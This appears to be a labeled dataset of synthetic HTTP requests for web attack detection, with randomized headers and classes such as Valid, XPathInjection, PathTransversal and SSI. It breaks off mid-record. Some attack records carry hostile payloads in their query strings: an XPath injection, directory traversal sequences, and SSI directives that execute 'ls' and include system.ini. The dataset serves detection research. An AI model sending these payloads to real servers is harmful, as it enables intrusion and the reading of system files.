If-Unmodified-Since: Mon, 10 Jan 05 01:57:59 UTC
If-Match: *
If-None-Match: "s60cuC287BQhojTh@j"
If-Range: *
Max-Forwards: 1901
MIME-Version: 0.5
Pragma: ls=tfeytr
Proxy-Authorization: iAwt ytdeMtan=qbp5ee
Authorization: Digest realm
Range: -901847,5-685
Referer: http://www.dlryrie.cz/rrobtm/fre8/Uacht.js
TE: chunked;q=0.1,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.3 (Windows; U; Win 9x 8.1; 3b-zc; rv:2.0.3) Gecko/65291369
UA-CPU: MIPS
UA-Disp: 985,925,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 962x171
Via: cyAc/4.5 73.251.135.175:0711, 8.7 www.EedsQ.htm
Transfer-Encoding: gzip
Upgrade: nemhde/8.2, tex32o/1.6, 6cPmot/5.9, eiypMx/6.4
Warning: 616 154.56.254.74 "ansu3dtaabmzoDoqtefe" 
X-Forwarded-For: 177.22.102.112
X-Serial-Number: 21052565504410930240
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14235
Start - Id: 49710
class: XPathInjection
GET /-tF60Rmdpasswd3/p_cR8V@0/b3DRM/1IyxYCRR8E/eH2W/aia5letenpwAh5erld.htm?anqrrSgrummoo5h=20766&td7=nselecto+5&oeltahCnl4d=+s+es&eaajsn6hnely=566&e9di4nsinesddAs=r%3B+systemnhshewsp3&goeis7qrfqirmae=3_RMY&IranNnhdihpmi6=%28u4cat&lh5rS=fMc6mlt7ii&RIelaex=lXJTo9xYQJ&yrXw=0229&@8Qp0zfEhLservices=abWeJ-&FKke74gnghttps7=%5BftHwrlvaao%27&ExL=sqRb&sieLptaz=aMsz3gn%27++++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or++++%27hea%27++%3D+%27&tunonrlnt=yzta4xBHZkx2 HTTP/1.1
Host: 6.41.123.173
Connection: eR9s
Accept: image/*, text/*;q=0.0, text/html;q=0.9
Accept-Charset: koi8-r;q=0.5
Accept-Encoding: 
Accept-Language: cymsitUn-7a, aideefn-iqA;q=0.7
Cache-Control: no-store
Client-ip: 228.33.237.21
Cookie: midqo=1459;tz@AXen=%i;lO@oB=0151208;ieid=1061766916;jetunlloh=fJukx1g
Cookie2: $Version="241"
Date: Fri, 07 May 04 22:02:26 UTC
ETag: W/"s3klw_r.kke6tQh"
Expect: eTteO
From: Etbaese@jwshhAoe.net
If-Modified-Since: Sun, 07 Jan 07 08:41:44 GMT
If-Unmodified-Since: Sat, 28 May 05 15:34:13 CET
If-Match: ".-.V.gqcyyEBT5mSH78"
If-None-Match: "bxfz4sL@ehLFv8mi"
If-Range: Wed, 16 Jan 08 05:04:33 CET
Max-Forwards: 9
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: e1tls Ridd=naieme
Authorization: Digest opaque="3udRemTa"
Range: 0-,006-0351
Referer: http://7aXhm.be/5m2psd1o/mnmta2/a8navang.jpeg
TE: gzip,chunked;q=0.8,trailers
Trailer: If-Unmodified-Since
User-Agent: h7oha/7.3.6.1.8
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: Uao3rt/9.1 www.amaaniaa.css, dti44/2.6 www.ktdzY.jpeg:7139
Transfer-Encoding: gzip
Upgrade: hdoAgi/1.2, icsn/0.8, don/0.5
Warning: 018 www.iupl6.jpg "b3zD8yiorsn" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 13247958
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49710
Start - Id: 765
class: Valid
GET /eap8rjbaxawSgnranl/TsamzMtM9L@i9K/2k.png?dhgHo3=54582062&ehhnd4snmdittrS=samtsu&z0qM.=qtKS%40&cs0nselpiwia0io=9eeNescriptornxdlrll&se84nncvHcLcst=eKkF_oY4H&wa=he&yottehts0nr=32&ooc=htpassnTrechovfEeT%5CieTRolwm&Xsgmyu3e3i=728&n9Hn=rlocationcosasubmetareamt HTTP/1.0
Host: 114.133.222.166
Connection: close
Accept: image/*;q=0.9, text/*;q=0.2
Accept-Charset: windows-874;q=0.4, gb2312;q=0.9, utf-8;q=0.1
Accept-Encoding: compress
Accept-Language: hsnosOot-Pfso7y;q=0.2
Cache-Control: only-if-cached
Client-ip: 134.77.212.164
Cookie: 0e=1396;eqnoascIe=87
Cookie2: $Version="9"
Date: Wed, 28 Oct 09 20:56:07 GMT
ETag: "rCyMbZGp@xUxGe1"
Expect: 100-continue
From: lucR@ehnvvno.fr
If-Modified-Since: Fri, 03 Mar 06 16:48:31 CET
If-Unmodified-Since: Thu, 15 Apr 04 22:17:48 UTC
If-Match: *
If-None-Match: "FZibI4Vus6_jkC6b"
If-Range: Fri, 11 Dec 09 10:51:58 GMT
Max-Forwards: 332
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: 9eT6pJ noloyso=splar
Authorization: Digest realm
Range: 74705-710
Referer: http://s5eeqntf.gov/EAatcdar/b8cbrrs/itad/d3Itic/nnies.jpeg
TE: trailers
Trailer: Range
User-Agent: Mozilla/5.9 (Windows; U; WinNT 8.5; aa-hs; rv:1.9.4) Gecko/16530902
UA-CPU: PowerPC
UA-Disp: 4382,1693,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 802x453
Via: 9.4 79.100.202.6, 7.6 www.ckarjrp.js:582
Transfer-Encoding: gzip
Upgrade: 6soh/9.1, cTein/9.4
Warning: 393 16.23.206.208 "aeeyywi82NiChtaec" 
X-Forwarded-For: 126.215.82.178
X-Serial-Number: 647816
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 765
Start - Id: 17212
class: Valid
GET /BsXX6BV_mN.htm?5vctgvnt=ebup9o&Z2mWwinnteNhtacces3ck=4736396&srhStephfr4hlzv=dURjEQeQ&ss13inph-W2bZy=iysa+6e&eiseepirWr=4903006 HTTP/1.1
Host: 29.195.122.171:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: b=mre5et
Client-ip: 106.60.218.207
Cookie: wTaaZbfcti7=eWMsnqy7G
Cookie2: $Version="4"
Date: Sun, 23 Dec 07 02:01:04 UTC
ETag: "VnVj3T3gmtLTjcIn"
Expect: n8ppa
From: esabrd@aecmV.uk
If-Modified-Since: Tue, 23 Sep 08 14:54:00 UTC
If-Unmodified-Since: Mon, 25 Aug 08 18:35:22 GMT
If-Match: "beGR2LQe1C4MH6i"
If-None-Match: "L3eJWdmZ__LQ-Z7tMre"
If-Range: Sat, 18 Nov 06 15:32:03 CET
Max-Forwards: 75
MIME-Version: 6.9
Pragma: us0ufEo=asi
Proxy-Authorization: dRini wnbheet=snah
Authorization: NTLM dHNhdGs4Y2dheWVoNm5ORWVpaG5JZ2VhbnNoYWFlZWRzZWViZWUwcjlu
Range: -188059,160660-4,9392-
Referer: http://0sbRW.be/yaflaiu/by3i.gif
TE: gzip;q=0.2
Trailer: Max-Forwards
User-Agent: Mozilla/6.2 (Machintosh; U; Mac OS X 9.5; cn-aM; rv:3.7.2) Gecko/68541971
UA-CPU: 68000
UA-Disp: 121,6829,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4168x797
Via: 5.5 149.161.227.241, 4beoti/1.7 www.theYrov.tiff:578, 9.0 www.G6cheiA.gif
Transfer-Encoding: deflate
Upgrade: dbe/0.9, tqus/7.9
Warning: 357 238.206.196.68:26 "c6hanltldc5sauds" 
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 80895113
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17212
Start - Id: 6809
class: Valid
POST /ei1eeNnhopTA/.ZDe2lRi/drulyl6R2ha/ahltEvidjrngdno/o8EiVc9buagVgU/lsR3Dwv_YfgVi/nJOWWxZGpj3XQ7RHMR/tJb8GDjw.oD_SZU3/2Bwp-MYED96/etiyneunnecd3bBc/tuZBr4/yCkW.html? HTTP/1.0
Content-Length: 277
Content-Language: c
Content-Encoding: compress
Content-Location: http://www.am0ds0e.fr/untsTs/oemclrto.zip
Content-MD5: cmh0czNvc29kc3VvOVdzeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Feb 08 03:50:37 CET
Last-Modified: Wed, 08 Nov 06 11:37:21 GMT
Host: www.nerzonkl.ch
Connection: close
Accept: video/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: rele='ags7hhql'
Client-ip: 239.194.209.222
Cookie: Oife=hdyurrpU<e;mochaNhqlYHyIeS=passthrutybun;stPmvnUno8dot=6276358;@hAYftppCmochalibNCL=b;rea;lbsodcSpeoe6a=612
Cookie2: $Version="98"
Date: Wed, 06 Jun 07 08:57:30 GMT
ETag: W/"HO-kbK.Uutl3mUwK.5"
Expect: 100-continue
From: cuaymSad@et4y.net
If-Modified-Since: Thu, 27 Jan 05 15:03:34 CET
If-Unmodified-Since: Wed, 01 Nov 06 17:09:42 UTC
If-Match: ".t9DK_cf3Q_98ZMn"
If-None-Match: "o4a_tdjKSdpix4qD-M"
If-Range: *
Max-Forwards: 329
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic ZERhZjplaG5v
Authorization: Digest response="b8CeBAFCdECfaED54dE77caD11eE26ae"
Range: 75-484,-76,208013-709
Referer: http://zeanf.it/eapI/voAiean/n2pe/alesoem.fgf
TE: trailers,deflate
Trailer: TE
User-Agent: Mozilla/8.1 (Machintosh; U; PPC 4.1; ro-od; rv:0.4.6) Gecko/92391381
UA-CPU: StrongARM
UA-Disp: 408,046,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5438x9106
Via: 8.8 www.satnnft.htm, FTP/6.1 www.eadpr.css, 1.9 www.D2ta.jpg
Transfer-Encoding: compress
Upgrade: oje/5.1
Warning: 797 59.247.222.32 "dfucaar" 
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 89698
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

tombeusoduo=0ro&wr6bW=yoiaraeqdoa&gUe1a1se=jnkiienafiesp&hcarr5r8ewsv= Rr&nynsshkhlo=thce@&tHcinbnm09ah=ovrsirhPm&tu2GLB2having=th &es9=wa-Q.2&nl=3179&za2ed=n2y9$&2tdrrtuStcD=copeninput&fwi9=2720963&oiupailh84so0se=lusrhx$ekRwchraccess_lognn&znad=o1Q&teczodv=idtpDem55pQT

End - Id: 6809
Start - Id: 44771
class: PathTransversal
GET /eDD2RIMS5O/luy1AUc/rcLT4TQ6LCwlIK1Ix7Wj/a2ag4me/tElne/aX2edlnnowMelue/as6uYQ0xUYOWirF9R/cwM@qFDcx/bzWQ2SICuB/LoaetsaxO.png?Iec=65799166&t3=edi&scuioMisestv=irtrsr&ly=E&rDqrz3f0p=%25dbAtieTsmetagbi&egrss=.%2F..%2F.%2F..%2F HTTP/1.1
Host: 112.123.112.120
Connection: zysa2
Accept: text/*, application/zip;q=0.1, audio/x-wav;q=0.8
Accept-Charset: iso-8859-3
Accept-Encoding: *;q=0.2
Accept-Language: L-Hehi6au, r-nolieeao;q=0.9, nsErfq2R-rc26s;q=0.8, cfxhB-erbDm
Cache-Control: max-age=38
Client-ip: 98.197.118.87
Cookie: GEG5xtHYjK=~a(ml'atudi o;NExOexecIo=42441
Cookie2: $Version="123"
Date: Mon, 11 Jan 10 04:35:51 UTC
ETag: W/"jG0mx5PG2xZN@2MUK"
Expect: 100-continue
From: sfn2@eoeOs.net
If-Modified-Since: Thu, 07 Sep 06 07:20:31 UTC
If-Unmodified-Since: Sun, 21 May 06 03:47:30 CET
If-Match: "lxoxiI4LKK5f8aahFsvS"
If-None-Match: *
If-Range: Wed, 23 Jul 08 11:47:37 CET
Max-Forwards: 622
MIME-Version: 1.4
Pragma: tiqhp9s='rt3Tise'
Proxy-Authorization: Digest realm
Authorization: f6ve 4s8acnn=n9oseln
Range: 6578-336232,-258470,45228-5909
Referer: http://mtr3k.be/ntIndchI/luotoair/psrokcn.dll
TE: trailers,deflate
Trailer: Warning
User-Agent: af.PRr http://www.sghnkia.uk
UA-CPU: Sparc
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 822x152
Via: 7.1 www.hneoy.tiff
Transfer-Encoding: compress
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 651 www.ohli.jpeg "ze4iSksESreE" 
X-Forwarded-For: 39.131.202.145
X-Serial-Number: 2157159271334
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44771
Start - Id: 6438
class: Valid
POST /0j1CT5systemm/SKu/gaedestlkhpfd/ohrtahilglsaPaohscve/jQ0-heR60s-.Hgq@M/urrqrttariNOnj9cl.cfm? HTTP/1.1
Content-Length: 231
Content-Language: at,d2isd8lr
Content-Encoding: identity
Content-Location: http://www.28eri.cz/bric/oadT/soczdU/lta75boE.php
Content-MD5: dGdvdGRvblIxZWFhbXRhNA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Apr 08 16:14:17 CET
Last-Modified: Sun, 20 Feb 05 08:07:27 UTC
Host: 52.86.171.157
Connection: jtimczEr
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.3
Cache-Control: max-age=21
Client-ip: 55.51.76.93
Cookie: rdRiibhr97htlz=oxwz5-76n;ntedwsc=sYcipp2Lqiv;I-Fu@oiDy=dtD__FlEzsbH;iybterrrl5drcmb=nris;nlwiioecZdq=76;lbodb=ua
Cookie2: $Version="909"
Date: Thu, 19 Apr 07 22:06:25 CET
ETag: W/"idPADgMMSPShJWt-3k"
Expect: i3mede
From: 5onfgr@tttceuz.gov
If-Modified-Since: Sun, 15 May 05 13:24:24 UTC
If-Unmodified-Since: Wed, 15 Oct 08 15:13:13 UTC
If-Match: "@i0lFCaukteq0as"
If-None-Match: "EJ1fSPWj4vA4e-ZPX"
If-Range: Sat, 08 Nov 08 11:03:19 CET
Max-Forwards: 365
MIME-Version: 5.7
Pragma: 0eax4osx=hosp
Proxy-Authorization: NTLM Y0FkaGNkZWV1YzN2YWx0ZWp0cHNsR2xPYVlhQTY2c3dlcGhhblJ0Z2tzZ2lhY2E=
Authorization: Basic T2Rkcm5lOm5pU2hvZlRz
Range: 20995-3,994884-5,-38008
Referer: http://www.oixd.uk/6hwpp/thaf3/izwrae/toscwt/hmjlrsa.fgf
TE: deflate
Trailer: Accept
User-Agent: Mozilla/0.2 (X11; U; Unix 1.8; 13-oe; rv:1.5.2) Gecko/16897021
UA-CPU: 68000
UA-Disp: 0332,310,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8174x6805
Via: 7.0 www.cnho0c.png, 9.0 255.135.180.38
Transfer-Encoding: identity
Upgrade: roeode/1.5, t4s/4.1, soug/6.1, 4eicou/3.7, tmcaor/3.0
Warning: 834 www.myeibl.html "tfAmnsglsree" 
X-Forwarded-For: 3.49.116.125
X-Serial-Number: 45754151629
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~

2vPd=c2&ZhredGuzIMm3jlr=7Zmxi&aeueoioherd=67162472&ioaMaesm=6gEtrweiaito&E.sOwhere=sNusrae3rt&2h0AazmoehHs=zinSzwtctcrli]optwindow.opens&seimgA0dQgroup byBwid=90239772&nh0=dND5i.BwJB2&tEraffhguaree=nn@|Soihaboot.iniej'e5rer

End - Id: 6438
Start - Id: 30667
class: Valid
GET /erHkm7tabmt9es.msf?kte=c%3Drtietcgnitar&nNehdg=arC28Yt&gqu7to=eskstyle&tun3teDo=peie&xxaKDOY1=LNa&ui1b=25&6Jaqdiv3KDW=eencerv2&eat=1893806 HTTP/1.0
Host: 25.190.108.24
Connection: kyohNT
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=16947
Client-ip: 245.173.208.221
Cookie: ID9zHU9kI=h\between;2zplKJ=heN;tTCgsi1nErhw=iddxyy9oytEaJsi]srf
Cookie2: $Version="8"
Date: Sat, 10 Jan 09 09:22:51 GMT
ETag: W/"oh1wEY@upMY@dYuAu"
Expect: omaeds=nc7eu
From: Sunw8ia@ecjo.be
If-Modified-Since: Sat, 25 Oct 08 02:17:28 GMT
If-Unmodified-Since: Fri, 19 Mar 04 17:22:44 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 19 Feb 10 08:01:54 UTC
Max-Forwards: 3010
MIME-Version: 1.3
Pragma: 8uU57v=s
Proxy-Authorization: otnae s4trl2e=Mefno
Authorization: Rqofot Oaywp=2hbltt
Range: -8149,-520812
Referer: http://rtvi.net/5I0or/59eud/shoaci.png
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: xetr (c.4BC5)
UA-CPU: PowerPC
UA-Disp: 7934,865,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7462x1873
Via: HTTP/7.8 www.sirbyif.png, 7.4 www.ucesw.html
Transfer-Encoding: gzip
Upgrade: eMR/0.4, Xw1Rp/0.0, t9se4/2.1, chf/5.5, oF4di/5.3
Warning: 834 64.62.125.81 "mrreedes" 
X-Forwarded-For: 21.250.209.193
X-Serial-Number: 62673072943112918
----: ------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 30667
Start - Id: 27301
class: Valid
GET /sR5TAbCA3f0/gx_QNZi_QsR95s0L@lh/t0hmqashtsehirIee8/cHo/c1TO7j1ZfcORjEc.mspx?1rpats=5931&cTntde1tO2tk=s&uthy=6Qn-qsL-cuZX&IeeksrGwsU8I=e5tasstp7ohdoees&s0txyeTmatpi=oa4Pxer0rl3ganl&tslnaTp4tz=anEyhJpFR8Jj&enaTE15oayop8r=9l%7E&431V5autoexec.d2m=530493521&oa=638&IbJB=309285548&4fT3=ud%28n+ain&ei=emBDApWQ&o0ul3Tmthe6esnr=shnunEbJ&logb5K46F=na HTTP/1.1
Host: 166.131.109.142
Connection: keep-alive
Accept: application/*;q=0.6, text/*, audio/*
Accept-Charset: iso-8859-8-i;q=0.1, iso-8859-5, iso-8859-6, windows-1255
Accept-Encoding: *
Accept-Language: anneoeg-yChrs6un;q=0.2, ar0h6cta-rthl;q=0.3
Cache-Control: max-age=05
Client-ip: 191.18.69.14
Cookie: 9wzanzCb=0693369;oorHu4Sr=3;taaesynooVso=?Llsfp;ncl9Too=ya;5tj6eaka=mi+
Cookie2: $Version="63"
Date: Sun, 14 Dec 08 05:13:18 UTC
ETag: "_wrVJwBLFAB1y_jnloUz"
Expect: 100-continue
From: 0alar@rjtiat6e.uk
If-Modified-Since: Sun, 02 May 10 24:53:34 UTC
If-Unmodified-Since: Tue, 28 Dec 04 11:52:10 CET
If-Match: "6-iTd6jAKx6CQ1Bn2"
If-None-Match: "B6IGT04sxI6fCRoC1-P."
If-Range: "HquC3KxfSwDZq7_"
Max-Forwards: 29
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic cmV5b21nYzp0dGlz
Authorization: Digest cnonce="yrmhni"
Range: 66063-2335,-09970
Referer: /aledlt/ax4sny8t/euloaso.jpeg
TE: chunked,trailers,trailers
Trailer: Via
User-Agent: Mozilla/5.1 (Windows; U; WinNT 5.4; oo-ke; rv:0.0.8) Gecko/47379452
UA-CPU: 68000
UA-Disp: 3109,349,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6912x6352
Via: 2.0 224.232.11.39
Transfer-Encoding: gzip
Upgrade: Eraaa/3.4, o7dr/1.3, si09Hb/5.7
Warning: 650 139.231.175.172 "eiohyeeedPe" 
X-Forwarded-For: 50.59.239.169
X-Serial-Number: 75164077038098175
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27301
Start - Id: 30111
class: Valid
GET /yPdCopenagUxhle/eieock7polraohlikqs/qo/33z3rpgpQOM2HGsDAHk1/ts3b4hteie.pl?niooydnleweeah=eXok HTTP/1.1
Host: 167.105.25.251:80
Connection: hicEpri
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 27.203.153.222
Cookie: ad=7983480025;3VB2=1i;jyTAudh= tnLy  Can;h
Cookie2: $Version="7"
Date: Sat, 12 May 07 05:30:52 CET
ETag: "r1jtsqj1MClaap3WG92"
Expect: 100-continue
From: iustaSag@Odyltrr.it
If-Modified-Since: Thu, 31 Dec 09 04:05:24 UTC
If-Unmodified-Since: Mon, 29 Jan 07 04:15:01 CET
If-Match: "T1JjdutVjY8vQLF"
If-None-Match: "Sj7@kX9HZ3V.3jGys4"
If-Range: Tue, 01 Jul 08 02:42:34 GMT
Max-Forwards: 58
MIME-Version: 1.5
Pragma: i9sas=en
Proxy-Authorization: NTLM c3RZbmdoanF0Vm1RYmlhb2ttd3J0b3NuZWtzbHJiaG5vbWFuNGxv
Authorization: Basic RW5oUG5hOnlvYWVFdA==
Range: -3400,603295-
Referer: http://www.smn6s.gov/erc9pt/denhN1o/h3aegah/zAIect.cgi
TE: gzip
Trailer: Date
User-Agent: niespEodii
UA-CPU: 68000
UA-Disp: 0585,478,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 118x9358
Via: 6.1 40.44.234.25, 1.6 45.95.14.196, 5.6 16.109.236.10
Transfer-Encoding: identity
Upgrade: AajeA/4.4
Warning: 166 93.46.119.175 "apeeou6Udinzauet" "Thu, 11 Dec 08 02:46:24 UTC"
X-Forwarded-For: 110.208.121.15
X-Serial-Number: 131299472861769232
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30111
Start - Id: 40114
class: SSI
GET /ksraSesbbh/c_fy/iTd1DtxD-/Dx/sf4vi3sn.html?IfromOANOMV=%3C%21--+%23exec+++++cmd%3D%22%2Fbin%2Fls+-l+%2Fhome%2Fekhadts%2FyPis5ect%22+++++--%3E&arMecSznflTnu2a=8653 HTTP/1.1
Host: www.twat5lN.cz
Connection: keep-alive
Accept: text/*;q=0.0, application/*;q=0.1, audio/*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: aet-dem;q=0.6, e-etknS;q=0.9, gni-gqst;q=0.5, tr-mc
Cache-Control: i9eiGAb=nr4iuel
Client-ip: 149.0.44.161
Cookie: jsbOsntiNfl=ehljhsysc;lw=95;1mAww=4993563;htneenDeE=2t;dtaNamamd7=6473
Cookie2: $Version="5"
Date: Fri, 07 Sep 07 21:04:51 GMT
ETag: W/"79F5Ef8wKTb4zqQ"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Tue, 16 Jun 09 23:54:35 CET
If-Unmodified-Since: Wed, 10 Oct 07 23:00:49 CET
If-Match: *
If-None-Match: "QBL6hjAmg7Mh1Slj"
If-Range: *
Max-Forwards: 6327
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic cGlwZWk6YWF3Yg==
Authorization: lcb2Rh 8feofloz=9eso
Range: 01784-577,9-7,8678-
Referer: http://www.l8saaLe.uk/31aalfve.jpeg
TE: deflate
Trailer: Proxy-Authorization
User-Agent: ngfnsd (ajOnU7Q-; sPoKs20t)
UA-CPU: 68000
UA-Disp: 3405,153,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7286x8366
Via: 3.9 238.176.162.116, FTP/7.3 www.eegmcn.htm
Transfer-Encoding: identity
Upgrade: uwekht/7.8, pbs/0.4, Iln/7.7, tec/5.7
Warning: 530 www.keiqse.jpeg "tjsEot3eeoicdet6rlc" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 3431591
----: ------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 40114
Start - Id: 16256
class: Valid
GET /ap.html?nseirerHnwe=0032&uym5eta3t=40&tUetAsdutsl0pxi=oaezrshi9iTrahiboT%3C HTTP/1.1
Host: 53.200.65.28
Connection: aeelcP
Accept: */*;q=0.8
Accept-Charset: x-mac-icelandic, x-mac-arabic;q=0.9, iso-8859-7;q=0.7, iso-8859-1
Accept-Encoding: identity;q=0.0, deflate;q=0.2, deflate, gzip, deflate;q=0.2
Accept-Language: s-nettocE;q=0.3
Cache-Control: no-cache
Client-ip: 252.250.241.161
Cookie: hvCperlXshutdownH=2ase
Cookie2: $Version="3"
Date: Mon, 16 Aug 04 19:48:54 GMT
ETag: W/"xNt8NPfOH10qUQS4hs@6"
Expect: 100-continue
From: 7oiia@y0aB.net
If-Modified-Since: Fri, 10 Dec 04 01:48:49 GMT
If-Unmodified-Since: Fri, 30 Dec 05 09:05:56 GMT
If-Match: *
If-None-Match: *
If-Range: "17LcuLKkJJAjN9e"
Max-Forwards: 7376
MIME-Version: 6.8
Pragma: dw='yrR6aej'
Proxy-Authorization: NTLM cmVlZXlObnVmblRkMmxvdGdSMG9sZXBud296dHdUeXFFdGNldVl6MGk=
Authorization: iz2gl rhfqt2af=ehg3
Range: 767-,-23616
Referer: /ntk1.swf
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.6 (Machintosh; U; PPC 6.3; ka-ts; rv:8.8.7) Gecko/03497949
UA-CPU: 68000
UA-Disp: 7368,0111,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2602x876
Via: 8tsyst/3.8 65.7.250.16
Transfer-Encoding: compress
Upgrade: pno/2.0, 92s3t/7.4, hio/3.0
Warning: 593 www.czyane.jpg "hnn6i2Nors" "Sun, 24 Jun 07 01:56:04 GMT"
X-Forwarded-For: 136.200.162.240
X-Serial-Number: 1613720445559
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16256
Start - Id: 40620
class: SSI
GET /ho/pFA474wS.exe?oaa7=%3C%21--%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E&8rwnruGeA=fJKmBmPUcngo&awnei=a+&me=dcAiuoecesmA&3adpnfefnriac7c=tLhomefroms&0c9il5weel=96730&ir4=khdfisrdymrra HTTP/1.0
Host: www.snNn.fr
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tseu-irtfrlEn, t9-rrdEd, iheifDeo-odqlonel;q=0.7, dylir-c;q=0.3, sycGptAl-rofsEE;q=0.3
Cache-Control: max-age=039
Cookie: 7G9ytgaHw=320458;xnelsno7x=i:rtsoete dhijoemochahe;ItharduicR=qxsigiliae;s2slEneinid=9;9honhxeehisrjn=y;sodsns=802181539
Cookie2: $Version="48"
Date: Fri, 08 Sep 06 13:06:10 CET
ETag: "BSYbTuX7wGz5Vkk"
If-Unmodified-Since: Tue, 25 Jan 05 17:32:55 CET
If-Match: "hiv8GOeXfHXt3lr.3wy"
If-None-Match: *
Max-Forwards: 765
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: 5dny iidu4=nicettyt
Authorization: Digest cnonce="ieamtns"
Range: 656012-5
Referer: /enh09h.aspx
TE: gzip
Trailer: Upgrade
User-Agent: jseilt1heehtn
UA-Disp: 959,926,32
Via: FTP/1.3 7.4.108.62
Transfer-Encoding: deflate
Upgrade: 43bua/6.8, mrble/6.7, ntta/4.0
Warning: 308 68.164.17.248 "itScteuheeanafg" 
X-Forwarded-For: 130.86.64.49
X-Serial-Number: 5234187897202701
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40620
Start - Id: 19673
class: Valid
GET /ooooHiodtzom1suliaMa/58D1T3J2oallj2/@CbX-EU1oMtDv/R-7aAEx0/ioabruEwqnpdtT.aspx?ns2EgTfbohae=cs7.%40ymlR&bm5O=58&ut2neolshs0n=ir&kA-p7XQEn3=fPi21gq&nietEdulehl=63&I1y1iNnXbs=%3Dw8t&5ADUtU=%3CwoE%25u&nlnrr0enRtkeM=h7ktrgLtoi&Sn=glnsnys+cs%5C5&td=K8ldyes3lk&diBto=ux1eorLM&sg=a%27&Atlt=7as HTTP/1.1
Host: www.elactn.st
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: gT-gro4, rwhu-Doeegt;q=0.6, d-hhko;q=0.2, eo-ncbh6Ea;q=0.2, ahe-makor9
Cache-Control: no-transform
Client-ip: 73.92.189.99
Cookie: aoos=504;pwczlizapg=616;rlelhRlelto=pi;Pr=01509;af=hYetu;vobjectb2xGmG=8
Cookie2: $Version="73"
Date: Fri, 01 Apr 05 21:03:10 GMT
ETag: "xhLkdR7Iv9S.2p3FBhDQ"
Expect: 100-continue
From: ecyrt@nhcb.it
If-Modified-Since: Thu, 13 Jan 05 12:42:09 GMT
If-Unmodified-Since: Tue, 27 Oct 09 18:25:57 CET
If-Match: "1i0ibLZ5H-npmYop"
If-None-Match: *
If-Range: Mon, 12 Dec 05 09:54:30 CET
Max-Forwards: 4
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: wncf sZiI=mapeesi
Authorization: NTLM eWhjdE5wbXhhYTc1WnRuck9pN3M3aWhpMGF0cmZNNEVuZVJIdG5Nc2UydA==
Range: -616446,-952232,-327
Referer: http://www.69tetl.cz/0o5ef2u/ztOoii3e/drwAmkr/rWlnm/rosb.asmx
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/2.1 (Machintosh; U; Mac OS X 2.6; a2-ol; rv:5.3.6) Gecko/54192435
UA-CPU: MIPS
